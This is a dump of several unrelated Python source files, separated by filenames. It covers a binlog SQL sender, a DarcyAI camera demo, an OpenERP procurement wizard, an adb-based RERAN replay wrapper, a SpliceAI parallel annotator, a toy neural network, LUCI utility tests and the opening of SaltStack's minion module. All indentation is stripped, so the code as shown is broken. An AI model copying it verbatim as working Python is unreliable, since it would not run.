self.check_list.append(hash_flag_old)
hash_flag = hash_flag_old
binlog_list.append(binlog)
# check_list清零
if len(self.check_list) >= 1000:
#self.flushjob()
self.check_list = []
if len(binlog_list) != 0:
sql_list = self.sqlConstruct.sqlConstruct(binlog_list)
self.sendSql(sql_list)
def sendSql(self,sql_list):
for i in range(len(sql_list)):
for sender in self.senderList:
sender.send(sql_list[i])
def updateCheckpointThreadFunc(self):
while True:
minTs = 1 << 64
time.sleep(3)
for sender in self.senderList:
minTs = min(minTs, sender.getCheckpoint())
self.commitTs = minTs
self.ackQueue.put(self.commitTs)
print "commitTs",self.commitTs
def flushjob(self):
for sender in self.senderList:
sender.flush()
|
people_perception.py
|
import cv2
import os
import threading
from darcyai import DarcyAI
from flask import Flask, request, Response
VIDEO_DEVICE = os.getenv("VIDEO_DEVICE", "/dev/video0")
def analyze(frame_number, objects):
return
for object in objects:
if object.body["has_face"]:
print("{}: {}".format(object.object_id, object.body["face_position"]))
else:
print("{}: No face".format(object.object_id))
def draw_object_rectangle_on_frame(frame, object):
box = object.bounding_box
cv2.rectangle(frame, box[0], box[1], (0, 0, 255), 1)
cv2.putText(frame, "{}: {}".format(object.uuid, object.body["face_position"]), (box[0][0] + 2, box[0][1] + 40), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (255, 255, 255), 2)
return frame
def frame_processor(frame_number, frame, detected_objects):
frame_clone = frame.copy()
for object in detected_objects:
frame_clone = draw_object_rectangle_on_frame(frame_clone, object)
return frame_clone
def root():
return flask_app.send_static_file('index.html')
if __name__ == "__main__":
script_dir = os.path.dirname(os.path.realpath(__file__))
flask_app = Flask(__name__, static_url_path=script_dir)
flask_app.add_url_rule("/", "root", root)
ai = DarcyAI(
data_processor=analyze,
frame_processor=frame_processor,
flask_app=flask_app,
arch="armv7l",
use_pi_camera=False,
video_device=VIDEO_DEVICE)
threading.Thread(target=ai.Start).start()
flask_app.run(
host="0.0.0.0",
port=3456,
debug=False)
|
orderpoint_procurement.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#
# Order Point Method:
# - Order if the virtual stock of today is bellow the min of the defined order point
#
import threading
from openerp import pooler
from openerp.osv import fields,osv
class procurement_compute(osv.osv_memory):
_name = 'procurement.orderpoint.compute'
_description = 'Automatic Order Point'
_columns = {
'automatic': fields.boolean('Automatic Orderpoint', help='If the stock of a product is under 0, it will act like an orderpoint'),
}
_defaults = {
'automatic': False,
}
def _procure_calculation_orderpoint(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
proc_obj = self.pool.get('procurement.order')
#As this function is in a new thread, I need to open a new cursor, because the old one may be closed
new_cr = pooler.get_db(cr.dbname).cursor()
for proc in self.browse(new_cr, uid, ids, context=context):
proc_obj._procure_orderpoint_confirm(new_cr, uid, automatic=proc.automatic, use_new_cursor=new_cr.dbname, context=context)
#close the new cursor
new_cr.close()
return {}
def procure_calculation(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
threaded_calculation = threading.Thread(target=self._procure_calculation_orderpoint, args=(cr, uid, ids, context))
threaded_calculation.start()
return {'type': 'ir.actions.act_window_close'}
procurement_compute()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
test.py
|
from time import sleep
import cv2
from threading import Thread
class App1:
def __init__(self, src=0):
self.stopped = False
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.thread = Thread(target=self.update, args=())
# self.thread.daemon = True # shutdowm when program quits
self.thread.start()
# def start(self):
# self.thread.start()
# def start(self):
# # start the thread to read frames from the video stream
# # Thread(target=self.update, args=()) \
# self.thread.start()
# return self
def update(self):
# display(self.pb)
# for i in range(200):
while True:
# print(':', end=' ' )
# print("here")
sleep(0.001)
if self.stopped:
break
# (self.grabbed, self.frame) = self.stream.read()
# print("here")
print("thread finished")
def stop(self):
"""indicate that the thread should be stopped"""
self.stopped = True
# wait until stream resources are released (producer thread might be still grabbing frame)
self.thread.join()
# app = App1().start()
app = App1()
|
RERANWrapper.py
|
import os
import sys
import argparse
from subprocess import call, check_output, Popen, PIPE
from multiprocessing import Process
import os.path as path
default_tests_path="./tests/"
translate_jar_path="./build/RERANTranslate.jar"
replay_bin_path="./build/replay"
def record_events(filename):
cmd = "adb shell getevent -t > " + filename
pipes = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
std_out, std_err = pipes.communicate()
pipes.wait()
class RERANWrapper(object):
"""docstring for RERANWrapper"""
def __init__(self, tests_folder, jar_path, translator_jar_path, replay_bin_path):
self.jar_path = jar_path
self.translator_jar_path = translator_jar_path
self.replay_bin_path = replay_bin_path
self.tests_folder = tests_folder
def pushToDevice(self, in_name):
filename=path.basename(in_name)
os.system("adb push " + in_name + " /sdcard/" + filename)
os.system("adb push " + self.replay_bin_path + " /sdcard/")
os.system("adb shell su -c \" cp /sdcard/" +filename+ " /data/local/ \"" )
os.system("adb shell su -c \" cp /sdcard/replay" + " /data/local/ \"" )
os.system("adb shell su -c \" chmod 777 /data/local/replay\"")
def replay(self, app_id,in_name):
filename=path.basename(in_name)
# run replay program with 0 delay time
os.system("adb shell su -c \" /data/local/./replay /data/local/" + filename+ " 0\"" )
def translate_events(self, fileDir, filename):
new_file="translated_" + filename
os.system("java -jar "+ self.translator_jar_path + " " + fileDir + "/"+filename + " "+ fileDir + "/" + new_file)
return os.path.join(fileDir ,new_file)
def record(self, app_id,out_name):
#check if exists directory for this app
dirname= os.path.join(self.tests_folder, app_id)
if not os.path.isdir(dirname):
os.mkdir(dirname)
# creates killable process that runs record_events function, since there isnt an easy way to kill threads in python
p=Process(target=record_events, args=(str(os.path.join(dirname, out_name)),))
p.start()
val = raw_input("press any key to stop recording")
p.terminate()
new_file = self.translate_events(str(dirname), out_name)
print( "translated events to " + new_file)
return new_file
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-r", "--replaypath", default=replay_bin_path, type=str)
parser.add_argument("-tf", "--testfolder", default=default_tests_path, type=str)
parser.add_argument("-jar", "--jarpath", default=translate_jar_path, type=str)
parser.add_argument("-t", "--task", default="all", type=str)
parser.add_argument("-o", "--outputfile", default="reran.out", type=str)
parser.add_argument("-a", "--appid", default="unknown_app", type=str)
args = parser.parse_args()
task_name = args.task
reran = RERANWrapper(args.testfolder, args.jarpath, args.jarpath, args.replaypath)
if task_name == "record":
reran.record(args.appid,args.outputfile)
elif task_name == "replay":
reran.replay(args.appid,args.outputfile)
elif task_name == "push":
reran.pushToDevice( args.outputfile)
elif task_name == "all":
new_file = reran.record(args.appid,args.outputfile)
reran.pushToDevice(new_file)
reran.replay(args.appid,new_file)
|
__main__.py
|
import queue
import argparse
import logging
from multiprocessing import Queue, Process, cpu_count
from itertools import count
import pysam
from spliceai.utils import Annotator, get_delta_scores
from collections import namedtuple
try:
from sys.stdin import buffer as std_in
from sys.stdout import buffer as std_out
except ImportError:
from sys import stdin as std_in
from sys import stdout as std_out
def get_options():
parser = argparse.ArgumentParser(description='Version: 1.3')
parser.add_argument('-I', metavar='input', nargs='?', default=std_in,
help='path to the input VCF file, defaults to standard in')
parser.add_argument('-O', metavar='output', nargs='?', default=std_out,
help='path to the output VCF file, defaults to standard out')
parser.add_argument('-R', metavar='reference', required=True,
help='path to the reference genome fasta file')
parser.add_argument('-A', metavar='annotation', required=True,
help='"grch37" (GENCODE V24lift37 canonical annotation file in '
'package), "grch38" (GENCODE V24 canonical annotation file in '
'package), or path to a similar custom gene annotation file')
parser.add_argument('-D', metavar='distance', nargs='?', default=50,
type=int, choices=range(0, 5000),
help='maximum distance between the variant and gained/lost splice '
'site, defaults to 50')
parser.add_argument('-M', metavar='mask', nargs='?', default=0,
type=int, choices=[0, 1],
help='mask scores representing annotated acceptor/donor gain and '
'unannotated acceptor/donor loss, defaults to 0')
parser.add_argument('-P', metavar='processes', default=1, type=int)
args = parser.parse_args()
return args
def run_serial(args):
"""
串行运行
"""
try:
vcf = pysam.VariantFile(args.I)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
header = vcf.header
header.add_line('##INFO=<ID=SpliceAI,Number=.,Type=String,Description="SpliceAIv1.3 variant '
'annotation. These include delta scores (DS) and delta positions (DP) for '
'acceptor gain (AG), acceptor loss (AL), donor gain (DG), and donor loss (DL). '
'Format: ALLELE|SYMBOL|DS_AG|DS_AL|DS_DG|DS_DL|DP_AG|DP_AL|DP_DG|DP_DL">')
try:
output = pysam.VariantFile(args.O, mode='w', header=header)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
ann = Annotator(args.R, args.A)
for record in vcf:
scores = get_delta_scores(record, ann, args.D, args.M)
if len(scores) > 0:
record.info['SpliceAI'] = scores
output.write(record)
vcf.close()
output.close()
ParallelVariantRecord = namedtuple('ParallelVariantRecord', ['id', 'chrom', 'pos', 'ref', 'alts'])
def process_record(records, results, ref_fasta, annotations, dist_var, mask):
# 创建一个注释助手类
ann = Annotator(ref_fasta, annotations)
# 监听队列
while True:
# 尝试从队列获得一个待打分的变异
try:
record = records.get_nowait()
except queue.Empty:
continue
# 判断队列是否结束
if record != 'END':
# 对变异进行打分并把结果放入队列
scores = get_delta_scores(record, ann, dist_var, mask)
results.put((record.id, scores))
else:
# 队列结束,重新把结束标志放入队列,以终止其他进程
records.put('END')
break
def run_parallel(args):
"""
并行运行
"""
# 尝试打开文件
try:
vcf = pysam.VariantFile(args.I)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
header = vcf.header
header.add_line('##INFO=<ID=SpliceAI,Number=.,Type=String,Description="SpliceAIv1.3 variant '
'annotation. These include delta scores (DS) and delta positions (DP) for '
'acceptor gain (AG), acceptor loss (AL), donor gain (DG), and donor loss (DL). '
'Format: ALLELE|SYMBOL|DS_AG|DS_AL|DS_DG|DS_DL|DP_AG|DP_AL|DP_DG|DP_DL">')
try:
output = pysam.VariantFile(args.O, mode='w', header=header)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
# 计算可用的核心数
processes_num = min(cpu_count(), args.P)
# 创建队列,队列长度10倍于进程数,既避免队列过大占用内存,又避免占用读取IO阻塞
records, results = Queue(10 * processes_num), Queue()
# 记录已经进入队列,等待运行运行结果的变异
waiting_records = dict()
# 生成记录ID
record_ids = count()
# 运行标记
input_finished = False
output_finished = False
# 启动新进程,监听队列
for i in range(processes_num):
Process(target=process_record, args=(records, results, args.R, args.A, args.D, args.M)).start()
while True:
# 向队列中加入变异
while not input_finished and not records.full():
try:
# 取得变异
record_id, record = next(record_ids), next(vcf)
# 将变异放入队列
# pysam自带的VariantRecord对象无法在多个进程中共享,使用自己模仿的对象替换
records.put(ParallelVariantRecord(record_id, record.chrom, record.pos, record.ref, record.alts))
waiting_records[record_id] = record
except StopIteration:
# 读取结束,进行记录并放入队列结束标记
input_finished = True
records.put('END')
break
# 处理获得的结果
while waiting_records:
# 尝试从队列获得结果
try:
result = results.get_nowait()
except queue.Empty:
break
# 打分结果和变异对应
record = waiting_records.pop(result[0])
# 输出打分后的变异
if len(result[1]) > 0:
record.info['SpliceAI'] = result[1]
output.write(record)
else:
# 标记队列结束
output_finished = True
# 全部处理完成
if output_finished:
break
vcf.close()
output.close()
def main():
args = get_options()
if None in [args.I, args.O, args.D, args.M]:
logging.error('Usage: spliceai [-h] [-I [input]] [-O [output]] -R reference -A annotation '
'[-D [distance]] [-M [mask]]')
exit()
# 根据参数的核心数来选择串行或者并行运行
run_serial(args) if args.P == 1 else run_parallel(args)
if __name__ == '__main__':
main()
|
v2_Process_algoritimo_aprendizagem_02.py
|
import numpy as np
import datetime
from concurrent.futures.process import ProcessPoolExecutor as Process
from threading import Thread
inicio = datetime.datetime.now()
def sigmoid(soma):
return 1 / (1 + np.exp(-soma))
def sigmoidDerivada(sig):
return sig * (1 - sig)
def processar(epocas, entradas,saidas,taxaAprendizagem,momento,pesos0, pesos1):
for j in range(epocas):
camadaEntrada = entradas
somaSinapse0 = np.dot(camadaEntrada, pesos0)
camadaOculta = sigmoid(somaSinapse0)
somaSinapse1 = np.dot(camadaOculta, pesos1)
camadaSaida = sigmoid(somaSinapse1)
erroCamadaSaida = saidas - camadaSaida
mediaAbsoluta = np.mean(np.abs(erroCamadaSaida))
print(f"Epocas {j}.... Erro: {str(mediaAbsoluta)}")
derivadaSaida = sigmoidDerivada(camadaSaida)
deltaSaida = erroCamadaSaida * derivadaSaida
pesos1Transposta = pesos1.T
deltaSaidaXPeso = deltaSaida.dot(pesos1Transposta)
deltaCamadaOculta = deltaSaidaXPeso * sigmoidDerivada(camadaOculta)
camadaOcultaTransposta = camadaOculta.T
pesosNovo1 = camadaOcultaTransposta.dot(deltaSaida)
pesos1 = (pesos1 * momento) + (pesosNovo1 * taxaAprendizagem)
camadaEntradaTransposta = camadaEntrada.T
pesosNovo0 = camadaEntradaTransposta.dot(deltaCamadaOculta)
pesos0 = (pesos0 * momento) + (pesosNovo0 * taxaAprendizagem)
entradas = np.array([[0,0],
[0,1],
[1,0],
[1,1]])
saidas = np.array([[0],[1],[1],[0]])
pesos0 = 2*np.random.random((2,3)) - 1
pesos1 = 2*np.random.random((3,1)) - 1
epocas = 10000
taxaAprendizagem = 0.5
momento = 1
if __name__ == '__main__':
with Process() as chamada:
futuro = chamada.submit(processar, epocas, entradas,saidas,taxaAprendizagem,momento,pesos0, pesos1)
th = Thread(target=futuro)
th.start()
th.join()
tempo_atual = datetime.datetime.now() - inicio
print(f'Tempo de duração foi de {tempo_atual.total_seconds():.5f} segundos')
|
utils_test.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
# Disable 'Access to a protected member ...'. NDB uses '_' for other purposes.
# pylint: disable=W0212
import datetime
import sys
import threading
import unittest
from test_support import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components import utils
from test_support import test_case
class Rambling(ndb.Model):
"""Fake statistics."""
a = ndb.IntegerProperty()
b = ndb.FloatProperty()
c = ndb.DateTimeProperty()
d = ndb.DateProperty()
def to_dict(self):
out = super(Rambling, self).to_dict()
out['e'] = datetime.timedelta(seconds=1.1)
out['f'] = '\xc4\xa9'
return out
class UtilsTest(test_case.TestCase):
def test_json(self):
r = Rambling(
a=2,
b=0.2,
c=datetime.datetime(2012, 1, 2, 3, 4, 5, 6),
d=datetime.date(2012, 1, 2))
actual = utils.to_json_encodable([r])
# Confirm that default is tight encoding and sorted keys.
expected = [
{
'a': 2,
'b': 0.2,
'c': u'2012-01-02 03:04:05',
'd': u'2012-01-02',
'e': 1,
'f': u'\u0129',
},
]
self.assertEqual(expected, actual)
self.assertEqual([0, 1], utils.to_json_encodable(range(2)))
self.assertEqual([0, 1], utils.to_json_encodable(i for i in (0, 1)))
self.assertEqual([0, 1], utils.to_json_encodable(xrange(2)))
def test_validate_root_service_url_dev_server(self):
self.mock(utils, 'is_local_dev_server', lambda: True)
utils.validate_root_service_url('https://blah')
utils.validate_root_service_url('http://localhost:8080')
def test_validate_root_service_url_gae(self):
self.mock(utils, 'is_local_dev_server', lambda: False)
utils.validate_root_service_url('https://blah')
with self.assertRaises(ValueError):
utils.validate_root_service_url('http://localhost:8080')
def test_validate_root_service_bad(self):
with self.assertRaises(ValueError):
utils.validate_root_service_url('')
with self.assertRaises(ValueError):
utils.validate_root_service_url('blah://blah')
with self.assertRaises(ValueError):
utils.validate_root_service_url('https://')
with self.assertRaises(ValueError):
utils.validate_root_service_url('https://blah/')
with self.assertRaises(ValueError):
utils.validate_root_service_url('https://blah?asdad')
def test_datetime_to_rfc2822(self):
self.assertEqual(
'Mon, 02 Jan 2012 03:04:05 -0000',
utils.datetime_to_rfc2822(datetime.datetime(2012, 1, 2, 3, 4, 5)))
def test_milliseconds_since_epoch(self):
self.mock_now(datetime.datetime(1970, 1, 2, 3, 4, 5, 6789))
delta = utils.milliseconds_since_epoch(None)
self.assertEqual(97445007, delta)
def test_cache(self):
calls = []
@utils.cache
def get_me():
calls.append(1)
return len(calls)
self.assertEqual(1, get_me())
self.assertEqual(1, get_me())
self.assertEqual(1, len(calls))
def test_cache_with_tasklets(self):
@utils.cache
def f():
ndb.sleep(0).wait() # Yield thread.
return 1
@ndb.tasklet
def g():
yield () # Make g a generator.
raise ndb.Return(f())
def test():
ndb.Future.wait_all([(g()), (g())])
t = threading.Thread(target=test)
t.daemon = True
t.start()
t.join(1)
if t.is_alive():
self.fail('deadlock')
def test_clear_cache(self):
calls = []
@utils.cache
def get_me():
calls.append(1)
return len(calls)
self.assertEqual(1, get_me())
utils.clear_cache(get_me)
self.assertEqual(2, get_me())
self.assertEqual(2, len(calls))
class FakeNdbContext(object):
def __init__(self):
self.get_calls = []
self.set_calls = []
self.cached_value = None
@ndb.tasklet
def memcache_get(self, key):
self.get_calls.append(key)
raise ndb.Return(self.cached_value)
# pylint: disable=redefined-outer-name
@ndb.tasklet
def memcache_set(self, key, value, time=None):
self.cached_value = value
self.set_calls.append((key, value, time))
class MemcacheTest(test_case.TestCase):
def setUp(self):
super(MemcacheTest, self).setUp()
self.f_calls = []
self.f_value = 'value'
self.ctx = FakeNdbContext()
self.mock(ndb, 'get_context', lambda: self.ctx)
@utils.memcache('f', ['a', 'b', 'c', 'd'], time=54)
def f(self, a, b, c=3, d=4, e=5):
self.f_calls.append((a, b, c, d, e))
return self.f_value
@utils.memcache_async('f', ['a', 'b', 'c', 'd'], time=54)
@ndb.tasklet
def f_async(self, a, b, c=3, d=4, e=5):
self.f_calls.append((a, b, c, d, e))
raise ndb.Return(self.f_value)
def test_async(self):
self.f_async(1, 2, 3, 4, 5).get_result()
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
def test_call(self):
self.f(1, 2, 3, 4, 5)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
self.ctx.get_calls = []
self.f_calls = []
self.ctx.set_calls = []
self.f(1, 2, 3, 4)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [])
self.assertEqual(self.ctx.set_calls, [])
def test_none(self):
self.f_value = None
self.assertEqual(self.f(1, 2, 3, 4), None)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', (None,), 54)])
self.ctx.get_calls = []
self.f_calls = []
self.ctx.set_calls = []
self.assertEqual(self.f(1, 2, 3, 4), None)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [])
self.assertEqual(self.ctx.set_calls, [])
def test_call_without_optional_arg(self):
self.f(1, 2)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
def test_call_kwargs(self):
self.f(1, 2, c=30, d=40)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_call_all_kwargs(self):
self.f(a=1, b=2, c=30, d=40)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_call_packed_args(self):
self.f(*[1, 2])
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
def test_call_packed_kwargs(self):
self.f(1, 2, **{'c':30, 'd': 40})
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_call_packed_both(self):
self.f(*[1, 2], **{'c':30, 'd': 40})
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_empty_key_arg(self):
@utils.memcache('f')
def f(a):
# pylint: disable=unused-argument
return 1
f(1)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[]'])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[]', (1,), None)])
def test_nonexisting_arg(self):
with self.assertRaises(KeyError):
# pylint: disable=unused-variable
@utils.memcache('f', ['b'])
def f(a):
# pylint: disable=unused-argument
pass
def test_invalid_args(self):
with self.assertRaises(TypeError):
# pylint: disable=no-value-for-parameter
self.f()
with self.assertRaises(TypeError):
# pylint: disable=no-value-for-parameter
self.f(b=3)
with self.assertRaises(TypeError):
# pylint: disable=unexpected-keyword-arg
self.f(1, 2, x=3)
def test_args_prohibited(self):
with self.assertRaises(NotImplementedError):
# pylint: disable=unused-variable
@utils.memcache('f', [])
def f(a, *args):
# pylint: disable=unused-argument
pass
def test_kwargs_prohibited(self):
with self.assertRaises(NotImplementedError):
# pylint: disable=unused-variable
@utils.memcache('f', [])
def f(**kwargs):
# pylint: disable=unused-argument
pass
if __name__ == '__main__':
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Carbon',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Carbon release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
